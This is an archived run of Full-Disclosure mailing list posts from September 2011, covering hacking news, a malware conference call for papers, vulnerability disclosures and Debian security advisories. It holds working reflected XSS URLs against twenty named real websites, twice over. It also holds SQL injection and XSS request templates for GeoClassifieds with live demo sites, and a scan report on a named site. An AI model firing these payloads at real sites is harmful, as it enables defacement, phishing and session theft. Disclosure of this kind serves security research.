Re: [Full-disclosure] Cyberwar between Israel and Turkish Hacker

[Valdis . Kletnieks]

On Wed, 07 Sep 2011 04:55:36 +0530, Mohit Kumar said:

> Turkish hacker "*TurkGuvenligi*" hijacked some 350 Israeli websites on
> Sunday evening

> "*The hack represents a 10%-15% spike compared to the average number of
> daily hacks of Israeli websites*,"

Hmm... if 350 is a 10% spike, then the base value must be 3500 hacks *per day*
of Israeli websites.  I found a reference for there being 81,743 *.il domains
as of a few days ago:

http://www.webhosting.info/registries/country_stats/IL

Now admittedly, there's not a one-to-one correspondence between domains
and websites.  However, 3.5k hacks per day for 81K domains works out to
an *average* rate of every domain getting hacked at least once a month.
And remember kiddies - if out of 10 domains, 9 manage to fly under the wire
and not draw hacker's attention, that 10th domain needs to get whacked over
twice a week to keep that average up. ;)

One also has to wonder if all 350 sites were customers of the same DNS provider
and only one DNS server got hit.  Of course, in that case, the *real* story may
well have been "hacker nails DNS server, redirects everybody to his hack site
with a wildcard, only 350 out of 20,000 domains actually notice anything
happened".

Or it was actaully "Hacker nails DNS server for 7 or 8 high-eyeballs sites,
happens to nail 20,000 other domains on the same DNS server, of which 350
happened to be .il domains, and instead of the obvious "World Hackers Day"
interpretation, somebody concluded the fact that 350 were .il domains meant it
was "cyberwar against Israel". I wonder if there were 18.000 .com addresses
invovled too, if that would make it "cyberwar against the US".

/me suspects that it was "cyberwar against The Man, Dude" and 350 .il domains
were just accidental collateral damage.  But that doesn't make as good a 
narrative.

Fortunately, narratives are almost never connected to reality anyhow.

Just sayin' ;)


pgpA95Rw72msd.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Malcon 2011 - Call for Papers

[root]

You might as well organize the conference inside a prison and save the
police some time.

On 09/06/2011 08:26 PM, Mohit Kumar wrote:
> Malcon is the worlds first platform bringing together Malware and
> Information Security Researchers from across the globe to share key research
> insights into building and containment of the next generation malwares .
> 
> *Call for Papers:*
> Malcon 2011 are looking for new techniques, tool releases,unique research
> and about anything that’s breath-taking, related to Malwares. The papers and
> research work could be under any of the broad categories mentioned below :
> 
> *Hacking Tools: *Phishing Kits, code that aids any malware or malicious
> activity is welcome.
> *Malwares:* Rootkit, Trojan, Botnet, Bootkit, Virus, Keylogger, Virtual
> Machine based Malware, Mobile OS Based Malware (Android, Symbian, IPhone
> etc.)
> *Malware creation tools:* Toolkits to create any kind of malware
> *Web based malwares: *Web-Shells, Browser Runtime Malwares (Javascript,
> Flash)
> *Malware Infection and propagation methodologies:* Emerging Infection
> techniques, Intelligent target enumeration techniques, Web Based, Network
> Based, Cross-Platform Infection
> *Malware self-defence: *AV Detection Techniques (Polymorphism, Metamorphism,
> VM, Injection, System Hooks, Memory Hijacking),  Antivirus Exploitation
> Techniques, Anti-Reversing Techniques, Anti-Debugging Techniques, Techniques
> to bypass security mechanisms (AV, Anti-Malware Products), Secure Malware
> Communication (Command Control)
> 
> *Original Read at : The Hacker News ~
> http://thehackernews.com/2011/09/malcon-2011-call-for-papers.html*
> 
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 20 Famous websites vulnerable to Cross Site Scripting (XSS) Attack

[GloW - XD]

Very nice :)
Impressive for XSS (for once).
xd




On 7 September 2011 09:28, Mohit Kumar  wrote:

> Most of the biggest and Famous sites are found to be Vulnerable to XSS
> attack . Cross-site scripting (XSS) is a type of computer security
> vulnerability typically found in web applications which allow code injection
> by malicious web users into the web pages viewed by other users. Examples of
> such code include HTML code and client-side scripts. An exploited cross-site
> scripting vulnerability can be used by attackers to bypass access controls
> such as the same origin policy. Recently, vulnerabilities of this kind have
> been exploited to craft powerful phishing attacks and browser exploits.
> Cross-site scripting was originally referred to as CSS, although this usage
> has been largely discontinued.
>
> Hacker with code name "*Invectus*" list some such famous sites with
> XSS vulnerability as listed below :
> *1.)*
> http://video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D
>
> *2.)*
> http://www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *3.)*
> http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false
>
> *4.) *
> http://www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit
>
> *5.) *
> http://thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *6.)*
> http://www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *7.)*
> http://www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *8.)*
> http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *9.)*
> http://www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *10.)*
> http://www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *11.)*
> http://www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *12.)*
> http://www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu
>
> *13.) *
> http://cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *14.)*
> http://ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13
>
> *15.)*
> http://vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *16.)*
> http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6
>
> *17.)*
> http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *18.)*
> http://www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=http://www.uidaho.edu/search?xml=1&ticks=634508915004972966
>
> *19.)*
> https://vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *20.)*
> http://energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E
>
> Original Post ;  : The Hacker News ~
> http://thehackernews.com/2011/09/20-famous-websites-vulnerable-to-cross.html
> --
> *Regards,*
> *Owner,*
> *The Hacker News *
> *Truth is the most Powerful weapon against Injustice.*
>
>
> ___

[Full-disclosure] Malcon 2011 - Call for Papers

[Mohit Kumar]

Malcon is the worlds first platform bringing together Malware and
Information Security Researchers from across the globe to share key research
insights into building and containment of the next generation malwares .

*Call for Papers:*
Malcon 2011 are looking for new techniques, tool releases,unique research
and about anything that’s breath-taking, related to Malwares. The papers and
research work could be under any of the broad categories mentioned below :

*Hacking Tools: *Phishing Kits, code that aids any malware or malicious
activity is welcome.
*Malwares:* Rootkit, Trojan, Botnet, Bootkit, Virus, Keylogger, Virtual
Machine based Malware, Mobile OS Based Malware (Android, Symbian, IPhone
etc.)
*Malware creation tools:* Toolkits to create any kind of malware
*Web based malwares: *Web-Shells, Browser Runtime Malwares (Javascript,
Flash)
*Malware Infection and propagation methodologies:* Emerging Infection
techniques, Intelligent target enumeration techniques, Web Based, Network
Based, Cross-Platform Infection
*Malware self-defence: *AV Detection Techniques (Polymorphism, Metamorphism,
VM, Injection, System Hooks, Memory Hijacking),  Antivirus Exploitation
Techniques, Anti-Reversing Techniques, Anti-Debugging Techniques, Techniques
to bypass security mechanisms (AV, Anti-Malware Products), Secure Malware
Communication (Command Control)

*Original Read at : The Hacker News ~
http://thehackernews.com/2011/09/malcon-2011-call-for-papers.html*

-- 
*Regards,*
*Owner,*
*The Hacker News *
*Truth is the most Powerful weapon against Injustice.*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] 20 Famous websites vulnerable to Cross Site Scripting (XSS) Attack

[Mohit Kumar]

Most of the biggest and Famous sites are found to be Vulnerable to XSS
attack . Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications which allow code injection
by malicious web users into the web pages viewed by other users. Examples of
such code include HTML code and client-side scripts. An exploited cross-site
scripting vulnerability can be used by attackers to bypass access controls
such as the same origin policy. Recently, vulnerabilities of this kind have
been exploited to craft powerful phishing attacks and browser exploits.
Cross-site scripting was originally referred to as CSS, although this usage
has been largely discontinued.

Hacker with code name "*Invectus*" list some such famous sites with
XSS vulnerability as listed below :
*1.)*
http://video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D

*2.)*
http://www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*3.)*
http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false

*4.) *
http://www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit

*5.) *
http://thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*6.)*
http://www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*7.)*
http://www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*8.)*
http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*9.)*
http://www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*10.)*
http://www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*11.)*
http://www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*12.)*
http://www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu

*13.) *
http://cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*14.)*
http://ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13

*15.)*
http://vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*16.)*
http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6

*17.)*
http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*18.)*
http://www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=http://www.uidaho.edu/search?xml=1&ticks=634508915004972966

*19.)*
https://vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*20.)*
http://energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E

Original Post ;  : The Hacker News ~
http://thehackernews.com/2011/09/20-famous-websites-vulnerable-to-cross.html
-- 
*Regards,*
*Owner,*
*The Hacker News *
*Truth is the most Powerful weapon against Injustice.*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Registry Decoder - Digital Forensics Tool

[Mohit Kumar]

Digital forensics deals with the analysis of artifacts on all types of
digital devices. One of the most prevalent analysis techniques performed is
that of the registry hives contained in Microsoft Windows operating systems.
Registry Decoder was developed with the purpose of providing a single tool
for the acquisition, analysis, and reporting of registry contents.
*Download Here* 
Original Read at  :  : The Hacker News ~
http://thehackernews.com/2011/09/registry-decoder-digital-forensics-tool.html

-- 
*Regards,*
*Owner,*
*The Hacker News *
*Truth is the most Powerful weapon against Injustice.*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cyberwar between Israel and Turkish Hacker

[Mohit Kumar]

Turkish hacker "*TurkGuvenligi*" hijacked some 350 Israeli websites on
Sunday evening, launching a Domain Name System (DNS) attack on at least seven
high-profile 
websites
including
The Telegraph, Acer, National Geographic, UPS and Vodafone as well. Visitors
to some of the sites were diverted to a page declaring it was “*World
Hackers Day.*" Hackers calling themselves the "*TurkGuvenligi group*" calimd
the cyber-attack. "TurkGuvenligi translates as "*Turkish security.*"

"*The hack represents a 10%-15% spike compared to the average number of
daily hacks of Israeli websites*," Shai Blitzblau, head of Maglan-Computer
Warfare and Network Intelligence Labs, explained. Israel's military and
security establishment has invested significantly in cyber-warfare programs
in recent years and is considered one of the most advanced cyber-warfare
forces in the world, both in attack and defense modes.The Stuxnet virus that
downed systems at Iran's Bushehr nuclear reactor to a halt for over six
months is widely believed to have been the result of an Israeli
cyber-attack, although Israel has not admitted it.

Original Read at : The Hacker News ~
http://thehackernews.com/2011/09/cyberwar-between-israel-and-turkish.html
-- 
*Regards,*
*Owner,*
*The Hacker News *
*Truth is the most Powerful weapon against Injustice.*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] New Bugs released today on vl

[resea...@vulnerability-lab.com]

Hallo,
some new publications with technical details of today. For PoC &
resources (pictures, logs & co)  request  -> resea...@vulnerability-lab.com

Skype 5.3.x 2.2.x 5.2.x - Persistent Software Vulnerability

http://www.vulnerability-lab.com/get_content.php?id=182

ME Firewall Analyzer v7.1 - Multiple Web Vulnerabilities

http://www.vulnerability-lab.com/get_content.php?id=264

ME Central Desktop v7.x - Multiple Persistent Vulnerabilities

http://www.vulnerability-lab.com/get_content.php?id=36

WebWatchBot Monitor v5.1.16 - Divide by Zero Vulnerability

http://www.vulnerability-lab.com/get_content.php?id=7

Best Regards,
DK - Vlab

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Site Vulnerabilities: myexgf.com

[George Girtsou]

Site Vulnerabilities: myexgf.com

- Cross Site Scripting
This vulnerability affects /cgi-bin/te/o.cgi.

The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into
a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account,
impersonating the user. It is also possible to modify the content of the
page presented to the user.

Attack details
The GET variable s has been set to alert(507691789232).

- CRLF injection/HTTP response splitting
Affected items
/cgi-bin/te/o.cgi
The impact of this vulnerability
Is it possible for a remote attacker to inject custom HTTP headers. For
example, an attacker can inject session cookies or HTML code. This may
conduct to vulnerabilities like XSS (cross-site scripting) or session
fixation.

How to fix this vulnerability
You need to restrict CR(0x13) and LF(0x10) from the user input or properly
encode the output in order to prevent the injection of custom HTTP headers.


- SSL 2.0 deprecated protocol
Affected items
Server
The impact of this vulnerability
An attacker may be able to exploit these issues to conduct man-in-the-middle
attacks or decrypt communications between the affected service and clients.


How to fix this vulnerability
Disable SSL 2.0 and use SSL 3.0 or TLS 1.0 instead.

- SSL certificate invalid date
Affected items : Server
The impact of this vulnerability
The SSL certificate is not valid.

How to fix this vulnerability
Please verify you certificate validity period and in case regenare the
certificate.

 - Cookie manipulation
The impact of this vulnerability
By exploiting this vulnerability, an attacker may conduct a session fixation
attack. In a session fixation attack, the attacker fixes the user's session
ID before the user even logs into the target server, thereby eliminating the
need to obtain the user's session ID afterwards.

How to fix this vulnerability
You need to filter the output in order to prevent the injection of custom
HTTP headers or META tags. Additionally, with each login the application
should provide a new session ID to the user.

- User credentials are sent in clear text
Affected items
/videos/user.php

Apache server-status enabled
- Affected items : Web Server
The impact of this vulnerability
Information disclosure.

How to fix this vulnerability
Disable this functionality if not required. Comment out the  section from httpd.conf.

- TRACE Method Enabled
Affected items
Web Server
The impact of this vulnerability
Attackers may abuse HTTP TRACE functionality to gain access to information
in HTTP headers such as cookies and authentication data.

How to fix this vulnerability
Disable TRACE Method on the web server.

- URL redirection
Affected items
/cgi-bin/at3/out.cgi
The impact of this vulnerability
A remote attacker can redirect users from your website to a specified URL.
This problem may assist an attacker to conduct phishing attacks, trojan
distribution, spammers.

How to fix this vulnerability
Your script should properly sanitize user input.

- Password type input with autocomplete enabled
Affected items
/videos/user.php

How to fix this vulnerability
The password autocomplete should be disabled in sensitive applications.
To disable autocomplete, you may use a code similar to:


-


List of open TCP ports
Description
There are 10 open TCP ports on the remote host.

Port 21 - [ftp] is open.



Port 25 - [smtp] is open.
Port banner:

220 plainstrider.amerinoc.com ESMTP Exim 4.69 Fri, 26 Aug 2011 18:00:20
-0700




Port 53 - [domain] is open.



Port 80 - [http] is open.
Port banner:

HTTP/1.1 200 OK
Date: Sat, 27 Aug 2011 01:02:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html




Port 110 - [pop3] is open.
Port banner:

+OK Dovecot DA ready.




Port 143 - [imap] is open.
Port banner:

* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE
STARTTLS AUTH=PLAIN] Dovecot DA ready.




Port 443 - [https] is open.
Port banner:



400 Bad Request

Bad Request
Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL ...




Port 587 - [submission] is open.
Port banner:

220 plainstrider.amerinoc.com ESMTP Exim 4.69 Fri, 26 Aug 2011 18:16:26
-0700

[Full-disclosure] Permutation Oriented Programming - Part 2.

[Nelson Brito]

Just to let you know that new example codes and a demonstration video is now
available.

The new example codes is capable to bypass a MS08-078 workaround recommended by
Microsoft, proving the power of a Permutation Oriented Programming approach.

- Video:
http://fnstenv.blogspot.com/2011/09/permutation-oriented-programming-2.html
- Codes:
http://permutation-oriented-programming.googlecode.com/files/MS08-078_XML_Island
_Bypass.zip

For further details and extra documents/codes, please, refer to:
- http://code.google.com/p/permutation-oriented-programming/

Best regards.

PS: The vulnerability itself is not the key component, but the way it is
exploited is that so.

Nelson Brito
"Intellectus excedit, praestat tacere."
--
http://about.me/nbrito
8BD6 8CAD 41B7 19C5 EC04 C66D 70ED 23E4 E5AB 95EB

/* CIDR Calculator C Algorithm */
netmask   = ~(0x >> cidr);
hostid= (1 << (32 - cidr)) - 2;
_1st_addr = (ntohl(addr) & netmask) + 1;


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] GeoClassifieds Lite Multiple vulnerabilities

[Yassin Aboukir]

-
[+] Title: GeoClassifieds Lite Multiple vulnerabilities
[+] Affected Version : v2.0.1 & V2.0.3.1 & V2.0.3.2 &V2.0.4
[+] Software Link: http://geodesicsolutions.com/
[+] Tested on: Windows 7 
[+] Date : 25/08/2011
[+] Dork : "inurl:/admin/ Classifieds and Auctions
Software by Geodesic Solutions"
[+] Category : Webapps
[+] Severity : High to Medium
[+] Author   : Yassin Aboukir <01Xp01|At|Gmail.com>
[+] Site : http://www.Yaboukir.Com
--

[+] About the Software: [ Purchased Price: $399 USD - $799 USD] Geo
Classifieds Premier gives you all the options of the Basic classifieds
software edition, plus additional flexibility and powerful
functionality. It allows you to create multiple user groups and
multiple pricing plans, and is built to suit the most complicated
E-Commerce needs.

[+] How That can be Exploited :

### V2.0.1 : Suffer from SQL Injection and Cross site scripting (Xss)
vulnerability.

1- SQL Injection (High) :

http://Localhost/?a=19&c=id [SQL Attack]

2- Cookies Based SQL Injection (High) :

# Read More About The Attack :
http://www.Yaboukir.com/cookie-based-sql-injection/

The idea of the PoC is to Intercept the HTTP request sent to the
vulnerable Website using a Web Proxy (WebScarab for example or just
Tamper Data Firefox Add-on) then and modify The Cookie variable
language_id .

GET  HTTP/1.1
Host: localhost.com
Connection: keep-alive
Cookie: language_id=1[SQL attack]

3- Cross Site Scripting (Medium) :

The same thing with the Xss Vulnerability, all you have is to modify
the HTTP request .

GET  HTTP/1.1
Host: localhost.com
Connection: keep-alive
Cookie: alert('Xssed-By-Yassin');

Demos:
http://classified4u.biz/
http://www.freeclassifieds.aapkakolkata.com/


### V2.0.3.1 & V2.0.3.2 & V2.0.4 : Suffer from Cross site scripting (Xss).

1- Cross Site Scripting (Medium) :

http://Localhost/index.php?a=19&c=alert('Xssed By
Yassin');
http://Localhost/?a=19&c="+onmouseover=alert('Xssed-By-Yassin')+

Demos:
http://www.tescal.com/ads/
http://www.216ads.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [SECURITY] [DSA 2300-2] nss security update

[Valdis . Kletnieks]

On Tue, 06 Sep 2011 19:29:56 +0300, Georgi Guninski said:
 
> you appear to not be CVE(R) compliant. where is the CVE(R) id?

https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=DigiNotar

Right there.  Hope that helps.

> i immediately request you get a CVE(R) id and repost this email!!!

https://cve.mitre.org/about/terminology.html

They also didn't issue a CVE to match the CERT advisory CA-2001-04, so I expect
the guys at Mitre to do the same this time, for the same reasons (namely, that
a procedural error or compromise of a CA, although a security problem, isn't in
the class of things that CVE is tracking).



pgpFXGETsuT4X.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [SECURITY] [DSA 2300-2] nss security update

[Georgi Guninski]

On Mon, Sep 05, 2011 at 10:15:22PM +0200, Thijs Kinkhorst wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> - -
> Debian Security Advisory DSA-2300-2   secur...@debian.org
> http://www.debian.org/security/   Thijs Kinkhorst
> September 5, 2011  http://www.debian.org/security/faq
> - -
> 
> Package: nss
> Vulnerability  : comprimised certificate authority
> Problem type   : local(remote)
> Debian-specific: no
> CVE ID : not available
> 
> Several unauthorised SSL certificates have been found in the wild issued
> for the DigiNotar Certificate Authority, obtained through a security
> compromise with said company. Debian, like other software
> distributors, has as a precaution decided to disable the DigiNotar
> Root CA by default in the NSS crypto libraries.
> 
> As a result from further understanding of the incident, this update
> to DSA 2300 disables additional DigiNotar issuing certificates.
> 
> For the oldstable distribution (lenny), this problem has been fixed in
> version 3.12.3.1-0lenny6.
> 
> For the stable distribution (squeeze), this problem has been fixed in
> version 3.12.8-1+squeeze3.
> 
> For the unstable distribution (sid), this problem has been fixed in
> version 3.12.11-2.
> 
> We recommend that you upgrade your nss packages.
> 
> Further information about Debian Security Advisories, how to apply
> these updates to your system and frequently asked questions can be
> found at: http://www.debian.org/security/
> 
> Mailing list: debian-security-annou...@lists.debian.org


you appear to not be CVE(R) compliant. where is the CVE(R) id?

i immediately request you get a CVE(R) id and repost this email!!!

-- 
joro

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2301-1] rails security update

[Luciano Bello]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2301-1   secur...@debian.org
http://www.debian.org/security/ Luciano Bello
September 5, 2011  http://www.debian.org/security/faq
- -

Package: rails
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-2930 CVE-2011-2931 CVE-2011-3186 CVE-2009-4214

Several vulnerabilities have been discovered in Rails, the Ruby web
application framework. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2009-4214

A cross-site scripting (XSS) vulnerability had been found in the
strip_tags function. An attacker may inject non-printable characters
that certain browsers will then evaluate. This vulnerability only
affects the oldstable distribution (lenny).

CVE-2011-2930

A SQL injection vulnerability had been found in the quote_table_name
method could allow malicious users to inject arbitrary SQL into a
query.

CVE-2011-2931

A cross-site scripting (XSS) vulnerability had been found in the
strip_tags  helper. An parsing error can be exploited by an attacker,
who can confuse the parser and may inject HTML tags into the output
document.

CVE-2011-3186

A newline (CRLF) injection vulnerability had been found in
response.rb. This vulnerability allows an attacker to inject arbitrary
HTTP headers and conduct HTTP response splitting attacks via the
Content-Type header.

For the oldstable distribution (lenny), this problem has been fixed in
version 2.1.0-7+lenny1.

For the stable distribution (squeeze), this problem has been fixed in
version 2.3.5-1.2+squeeze1.

For the unstable distribution (sid), this problem has been fixed in
version 2.3.14.

We recommend that you upgrade your rails packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJOZS+XAAoJEOxfUAG2iX57/RoIANAWqvaKoG3V5sfmVzREDG4M
